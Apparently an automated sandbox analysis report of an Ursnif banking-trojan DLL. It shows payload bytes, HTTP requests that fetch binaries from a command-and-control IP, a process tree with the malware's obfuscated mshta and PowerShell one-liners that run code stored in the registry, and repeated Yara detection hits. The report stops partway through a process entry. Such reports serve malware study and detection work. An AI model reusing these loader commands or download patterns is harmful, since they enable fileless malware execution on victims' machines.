              Content-Disposition: inline; filename="61f1142c24e04.bin"
              Data Raw: f7 46 fb 9e 69 b9 56 c0 85 b5 3c ae 3e aa 33 38 35 5a 64 d6 52 bc 42 12 16 86 d3 f7 ff 19 25 a1 c8 72 2b cd 25 8a 0f 08 f0 2e e4 61 ba 42 9d 9e ee 3c 23 65 bb 49 f2 14 21 9d 9f bb f8 74 45 7d af 3c 4f 96 e8 0c 62 35 ae 13 55 7f f4 5b 3e ec 33 8a 5f 02 aa 2c bb 78 58 74 91 ef b2 91 fc 07 b1 e7 58 01 16 72 83 2b 7e 5a 2e 22 8b 9a 65 0b d7 79 6e 0d e7 28 15 6a e8 b1 91 82 21 54 f1 42 d4 5c ed 5a 9c ad ca f0 37 09 c3 4d 66 b4 a8 3a bf 34 89 96 61 91 fe 08 92 fa 9f 07 60 20 f9 72 77 bb 00 7e de 0d c5 36 8a 15 d9 0b d3 65 62 da dc bf de 5f 75 31 c8 2c 19 59 bb a0 b5 1d cd 5a 5f a9 ef 87 62 5a b8 2f ac b2 11 ba 5a 0e 85 47 da bb e7 69 e5 5a c5 8c 7e 71 4d cc 84 0c ca 20 e6 fc ea e1 ae 33 29 98 ea 7b 38 ab f4 89 e3 49 13 e8 f4 12 e2 b3 55 2c 03 e7 b0 71 4f 4c c1 67 d4 2f 4e 58 7a 5c 7c c7 91 c9 1f fb a9 00 72 7d 9e aa ed 09 bb e1 ea 33 18 c0 d8 95 2f c5 62 25 0b 77 08 41 79 0e 45 9e d9 2b fe e2 ff e7 46 c5 3c 9c 66 88 d2 65 6f d2 88 5a d0 b6 ad 21 b8 01 78 29 d4 8a 06 b1 40 40 bf d5 3d f3 f2 e8 5a fd c5 52 a6 bc 72 a5 1d e9 fe ff 88 56 52 a7 51 8c 13 e5 cb c9 d4 8b 03 7f bb 74 fb ac d1 e1 00 d2 40 cc 15 62 fd 28 ae d8 34 fd 56 dd 6c 02 c9 38 19 2f ff df ce c5 7b 74 cc 44 3d 9c 38 ea 8d 3a 35 f4 c4 01 79 8e 45 d4 c5 dd 89 51 09 7b 3a eb c5 23 9a c6 b6 24 68 77 a9 fb b9 ae c7 ad ae 82 05 1d 78 53 91 a8 80 31 28 10 54 42 2d 2b 6d 56 81 77 61 22 86 c5 47 fa 9a 53 8d bd 63 91 d5 01 a2 1c 33 70 53 45 62 7e 67 68 c2 25 eb 66 32 05 09 0b 79 d2 23 03 03 d2 3a f3 73 e2 c6 5f a8 02 78 b2 d6 5a 2e 24 6e f7 81 5d c4 a4 f2 1e ac 17 c2 eb 88 10 41 7d 02 c7 f9 c0 47 f5 73 8f 0c 15 77 09 27 50 3f 4d fe 7e 88 cb 97 9f 1f 67 28 83 81 84 a1 4b cc 96 e8 d8 2d 77 d2 a0 35 fc 5c c9 39 b0 32 79 1a 79 fb 68 7b 42 34 f4 a9 bb bc 44 6d 8c 97 71 2c 08 c7 8b d8 96 27 1e ed 11 b0 15 a2 16 73 18 fa 7b 31 dc d6 47 5a 83 a7 86 a5 91 84 19 02 d8 99 1f dd 25 a2 3e ee 3a 57 9f 14 d7 0b 14 b4 c3 2e 0c 9c 1c 82 eb ef 3f 79 73 0a 6b c1 1f ff bd 61 83 96 43 15 24 7d 24 26 68 20 d0 0c 3a 
69 57 e7 84 4e 04 45 00 39 98 a6 0a 32 41 54 26 8d 78 f2 ab 3b 20 7c b5 42 eb 10 e5 6b 44 e5 f5 9a be d3 42 f8 16 75 bc 5c 2e e0 33 7b cd cd 80 de 28 00 da 8d 26 0e cd 12 fc df be f4 7e 62 e2 1f c9 41 c2 50 74 c5 ac 31 fe 87 d6 9a bf 2a 3b fb 54 1d 7c e4 24 56 54 21 51 52 66 d7 68 04 3e 8a 5e 97 4c fb 60 8d 6f 65 19 9a f8 b0 c4 e0 21 62 ae 1b 91 96 d0 e9 64 c9 94 39 68 9b bd ef 96 5f 8c 09 32 26 fd 16 ee f6 a3 da 2f e8 a6 e4 d5 3f 8b f0 32 ce cb bf 75 ae d3 3a 63 3b eb 80 90 73 e7 ec 24 40 94 f0 a9 2f b8 db d8 33 c3 16 a7 2f fe eb cf 3b 01 f2 b1 51 9b 60 07 8c 7b 63 93 44 26 8d b7 ef 24 46 1b 61 71 a9 6a eb 5b 7f 79 93 d7 d1 7e 0d ca f6 93 48 e2 b2 3b 0f 6f 05 94 5d 16 58 25 ef ea e5 ff 5b e9 01 84 71 a3 4b 17 20 2a 79 0f 12 7b 26 ff bd d7 56 cb 30 91 35 69 4b 0a b1 34 12 d6 cf d7 54 01 1a 9e f1 32 69 9c 1d 55 46 91 fb b5 55 b9 fc 09 6b c8 ae 5c 74 ed 69 bb fe 85 58 bc cd 3d 88 e1 f0 b3 4f cf 7b e6 41 a2 f0 7c 6f 76 01 1a 14 33 47 5c aa e1 b8 3d c9 81 d6 dc 23 8d 90 12 a3 b9 e1 ed 50 ab 0e 1b d9 f3 45
              Data Ascii: FiV<>385ZdRB%r+%.aB<#eI!tE}<Ob5U[>3_,xXtXr+~Z."eyn(j!TB\Z7Mf:4a` rw~6eb_u1,YZ_bZ/ZGiZ~qM 3){8IU,qOLg/NXz\|r}3/b%wAyE+F<feoZ!x)@@=ZRrVRQt@b(4Vl8/{tD=8:5yEQ{:#$hwxS1(TB-+mVwa"GSc3pSEb~gh%f2y#:s_xZ.$n]A}Gsw'P?M~g(K-w5\92yyh{B4Dmq,'s{1GZ%>:W.?yskaC$}$&h :iWNE92AT&x; |BkDBu\.3{(&~bAPt1*;T|$VT!QRfh>^L`oe!bd9h_2&/?2u:c;s$@/3/;Q`{cD&$Faqj[y~H;o]X%[qK *y{&V05iK4T2iUFUk\tiX=O{A|ov3G\=#PE


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              3 | 192.168.2.3 | 49755 | 194.76.226.200 | 80 | C:\Windows\SysWOW64\rundll32.exe
              Timestamp | kBytes transferred | Direction | Data
              Jan 26, 2022 10:28:13.619188070 CET | 2599 | OUT | GET /drew/rBML1rj8uElJfatm/1XUPHcYedh6XQNG/RfzcEZujO75haDUuMp/MBSLanUya/vTUM6CjwjVB_2F1X1CjS/LV0aTkXgDCKfXT831Mw/iqWmLrFI0W1nnldmY0nQOm/5tR5VYVCXmkqO/7H59YBEK/Qx8N4StPVj2TG0lcxpPmDMJ/os_2F27yzy/K94E3NnjB3SOalL_2/B5phCQkfkmoU/vGkUfmn2z2D/bI_2FkP7bk5mb4/JjP_2B8QttRH66r/R92.jlk HTTP/1.1
              Cache-Control: no-cache
              Connection: Keep-Alive
              Pragma: no-cache
              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
              Host: 194.76.226.200
              Jan 26, 2022 10:28:13.898947001 CET | 2600 | IN | HTTP/1.1 200 OK
              Server: nginx/1.18.0 (Ubuntu)
              Date: Wed, 26 Jan 2022 09:28:13 GMT
              Content-Type: application/octet-stream
              Content-Length: 205974
              Connection: keep-alive
              Pragma: public
              Accept-Ranges: bytes
              Expires: 0
              Cache-Control: must-revalidate, post-check=0, pre-check=0
              Content-Disposition: inline; filename="61f1142dd784e.bin"
              Jan 26, 2022 10:28:14.677802086 CET | 2816 | OUT | GET /drew/qj8KFpDyUAB/xQ_2FW_2FRVQUR/xo7UR19sTv1fTteFGwviu/H1QAugjBS9BAganl/OqUmHFdTh92Mttp/bKzDAO3E0N_2BxZ1ow/sTpBKLA2p/6BUrMhtfsbHTEuRLWcq7/jTbARM2BAFwOLbLtYBa/i_2BLCetjq8jqUWnEo5XCb/sLP1ktID7e6VC/G3BV6Vkb/N29_2BJlXZ2HReVfDXYWlEP/mt9DueL_2F/NgPtBNn5wZiJtUInd/fWiE7TY0/hCY.jlk HTTP/1.1
              Cache-Control: no-cache
              Connection: Keep-Alive
              Pragma: no-cache
              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
              Host: 194.76.226.200
              Jan 26, 2022 10:28:14.955522060 CET | 2817 | IN | HTTP/1.1 200 OK
              Server: nginx/1.18.0 (Ubuntu)
              Date: Wed, 26 Jan 2022 09:28:14 GMT
              Content-Type: application/octet-stream
              Content-Length: 262298
              Connection: keep-alive
              Pragma: public
              Accept-Ranges: bytes
              Expires: 0
              Cache-Control: must-revalidate, post-check=0, pre-check=0
              Content-Disposition: inline; filename="61f1142ee57c1.bin"
              Jan 26, 2022 10:28:16.546865940 CET | 3093 | OUT | GET /drew/GVxzdEn3rJxHPgJaE/ckcbKS4onbSJ/ZdlWFtgOHAM/pJGsS1vTtWNP8h/yNsXRCxcvAA6AXQPJwabF/oYnH6redQswcAwtL/rDlMsMT_2FoiQ_2/BdNrJdcFdtJq9vsrPj/Pi_2B3_2B/dnsHU70OV9c4KUJyE_2F/0ip_2FIZ7Wqza0Ho2lN/KYodlnq6PG5KK9SBFWXHj5/viPS4jjPVWzpA/_2B2JOAM/KOBPUpSnsG9auoSxo_2BhjX/PvM1mRJl_2/FaBIYOp1w1wVY3Kqd/ZfinCIlH/i.jlk HTTP/1.1
              Cache-Control: no-cache
              Connection: Keep-Alive
              Pragma: no-cache
              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
              Host: 194.76.226.200
              Jan 26, 2022 10:28:16.817614079 CET | 3094 | IN | HTTP/1.1 200 OK
              Server: nginx/1.18.0 (Ubuntu)
              Date: Wed, 26 Jan 2022 09:28:16 GMT
              Content-Type: application/octet-stream
              Content-Length: 1800
              Connection: keep-alive
              Pragma: public
              Accept-Ranges: bytes
              Expires: 0
              Cache-Control: must-revalidate, post-check=0, pre-check=0
              Content-Disposition: inline; filename="61f11430c2f61.bin"


              Target ID:1
              Start time:10:27:39
              Start date:26/01/2022
              Path:C:\Windows\System32\loaddll32.exe
              Wow64 process (32bit):true
              Commandline:loaddll32.exe "C:\Users\user\Desktop\61f113091fd0c.dll"
              Imagebase:0xb20000
              File size:116736 bytes
              MD5 hash:7DEB5DB86C0AC789123DEC286286B938
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.313620006.0000000002178000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.419223881.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.357803374.0000000002178000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.416632245.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.419462428.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.313789835.0000000002178000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.416948546.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.418907434.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.418190503.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.418488620.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.313081553.0000000002178000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.312190736.0000000002178000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.419037087.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: SUSP_LNK_SuspiciousCommands, Description: Detects LNK file with suspicious content, Source: 00000001.00000002.511490355.000000000134C000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.359673745.0000000001F7C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.312479873.0000000002178000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.313276698.0000000002178000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.313441363.0000000002178000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.312864720.0000000002178000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000001.00000003.419113309.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              Reputation:high

              Target ID:2
              Start time:10:27:39
              Start date:26/01/2022
              Path:C:\Windows\SysWOW64\cmd.exe
              Wow64 process (32bit):true
              Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\61f113091fd0c.dll",#1
              Imagebase:0xd80000
              File size:232960 bytes
              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              Target ID:3
              Start time:10:27:40
              Start date:26/01/2022
              Path:C:\Windows\SysWOW64\regsvr32.exe
              Wow64 process (32bit):true
              Commandline:regsvr32.exe /s C:\Users\user\Desktop\61f113091fd0c.dll
              Imagebase:0x290000
              File size:20992 bytes
              MD5 hash:426E7499F6A7346F0410DEAD0805586B
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.365747529.0000000005608000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.318724371.0000000005608000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.319004486.0000000005608000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.318536421.0000000005608000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.318886527.0000000005608000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.318950101.0000000005608000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.318813278.0000000005608000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.424590800.0000000006248000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.318621591.0000000005608000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.370947214.000000000540C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.319064007.0000000005608000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              Reputation:high

              Target ID:4
              Start time:10:27:40
              Start date:26/01/2022
              Path:C:\Windows\SysWOW64\rundll32.exe
              Wow64 process (32bit):true
              Commandline:rundll32.exe "C:\Users\user\Desktop\61f113091fd0c.dll",#1
              Imagebase:0x1160000
              File size:61952 bytes
              MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.360636522.00000000054DC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.311195582.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.310678862.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.310826841.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.311031834.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.310564493.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.311384342.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.358039219.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.311319683.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.310393039.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.416179066.00000000064A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              Reputation:high

              Target ID:5
              Start time:10:27:40
              Start date:26/01/2022
              Path:C:\Windows\SysWOW64\rundll32.exe
              Wow64 process (32bit):true
              Commandline:rundll32.exe C:\Users\user\Desktop\61f113091fd0c.dll,DllRegisterServer
              Imagebase:0x1160000
              File size:61952 bytes
              MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.311254885.0000000005568000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.310802933.0000000005568000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.310405280.0000000005568000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.357904969.0000000005568000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.311387225.0000000005568000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.311048648.0000000005568000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.310688564.0000000005568000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.310571881.0000000005568000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.310907059.0000000005568000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.360822217.000000000536C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.416181802.0000000006078000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
              Reputation:high

              Target ID:11
              Start time:10:28:17
              Start date:26/01/2022
              Path:C:\Windows\System32\mshta.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\System32\mshta.exe" "about:<hta:application><script>Tm45='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Tm45).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
              Imagebase:0x7ff67fff0000
              File size:14848 bytes
              MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Reputation:high

              Target ID:12
              Start time:10:28:17
              Start date:26/01/2022
              Path:C:\Windows\System32\mshta.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\System32\mshta.exe" "about:<hta:application><script>Sr9b='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Sr9b).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
              Imagebase:0x7ff67fff0000
              File size:14848 bytes
              MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Reputation:high

              Target ID:13
              Start time:10:28:17
              Start date:26/01/2022
              Path:C:\Windows\System32\mshta.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\System32\mshta.exe" "about:<hta:application><script>Agjk='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Agjk).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
              Imagebase:0x7ff67fff0000
              File size:14848 bytes
              MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Reputation:high

              Target ID:14
              Start time:10:28:19
              Start date:26/01/2022
              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Wow64 process (32bit):false
              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name rstcfqup -value gp; new-alias -name xanymucsw -value iex; xanymucsw ([System.Text.Encoding]::ASCII.GetString((rstcfqup "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
              Imagebase:0x7ff777fc0000
              File size:447488 bytes
              MD5 hash:95000560239032BC68B4C2FDFCDEF913
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:.Net C# or VB.NET
              Reputation:high

              Target ID:15
              Start time:10:28:19
              Start date:26/01/2022
              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Wow64 process (32bit):false
              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name rstcfqup -value gp; new-alias -name xanymucsw -value iex; xanymucsw ([System.Text.Encoding]::ASCII.GetString((rstcfqup "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
              Imagebase:0x7ff777fc0000
              File size:447488 bytes
              MD5 hash:95000560239032BC68B4C2FDFCDEF913
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:.Net C# or VB.NET
              Reputation:high

              Target ID:16
              Start time:10:28:20
              Start date:26/01/2022
              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Wow64 process (32bit):false
              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name rstcfqup -value gp; new-alias -name xanymucsw -value iex; xanymucsw ([System.Text.Encoding]::ASCII.GetString((rstcfqup "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
              Imagebase:0x7ff777fc0000
              File size:447488 bytes
              MD5 hash:95000560239032BC68B4C2FDFCDEF913
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:.Net C# or VB.NET
              Reputation:high

              Target ID:17
              Start time:10:28:20
              Start date:26/01/2022
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff7f20f0000
              File size:625664 bytes
              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language

              Target ID:18
              Start time:10:28:20
              Start date:26/01/2022
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff7f20f0000
              File size:625664 bytes
              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language

              Target ID:19
              Start time:10:28:20
              Start date:26/01/2022
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff7f20f0000
              File size:625664 bytes
              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language

              Target ID:20
              Start time:10:28:21
              Start date:26/01/2022
              Path:C:\Windows\System32\mshta.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\System32\mshta.exe" "about:<hta:application><script>Eote='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Eote).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
              Imagebase:0x7ff67fff0000
              File size:14848 bytes
              MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language

              Target ID:21
              Start time:10:28:26
              Start date:26/01/2022
              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Wow64 process (32bit):false
              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name gpcceqbj -value gp; new-alias -name qlrwbeixf -value iex; qlrwbeixf ([System.Text.Encoding]::ASCII.GetString((gpcceqbj "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
              Imagebase:0x7ff777fc0000
              File size:447488 bytes
              MD5 hash:95000560239032BC68B4C2FDFCDEF913
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:.Net C# or VB.NET

              Target ID:22
              Start time:10:28:26
              Start date:26/01/2022
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff7f20f0000
              File size:625664 bytes
              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language

              Target ID:25
              Start time:10:28:37
              Start date:26/01/2022
              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sjfy431f.cmdline
              Imagebase:0x7ff7eabb0000
              File size:2739304 bytes
              MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:.Net C# or VB.NET

              Target ID:26
              Start time:10:28:39
              Start date:26/01/2022
              Path:C:\Windows\System32\control.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\control.exe -h
              Imagebase:0x7ff78fda0000
              File size:117760 bytes
              MD5 hash:625DAC87CB5D7D44C5CA1DA57898065F
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language

              Target ID:27
              Start time:10:28:40
              Start date:26/01/2022
              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\oyq1c2cj.cmdline
              Imagebase:0x7ff7eabb0000
              File size:2739304 bytes
              MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:.Net C# or VB.NET

              Target ID:28
              Start time:10:28:42
              Start date:26/01/2022
              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
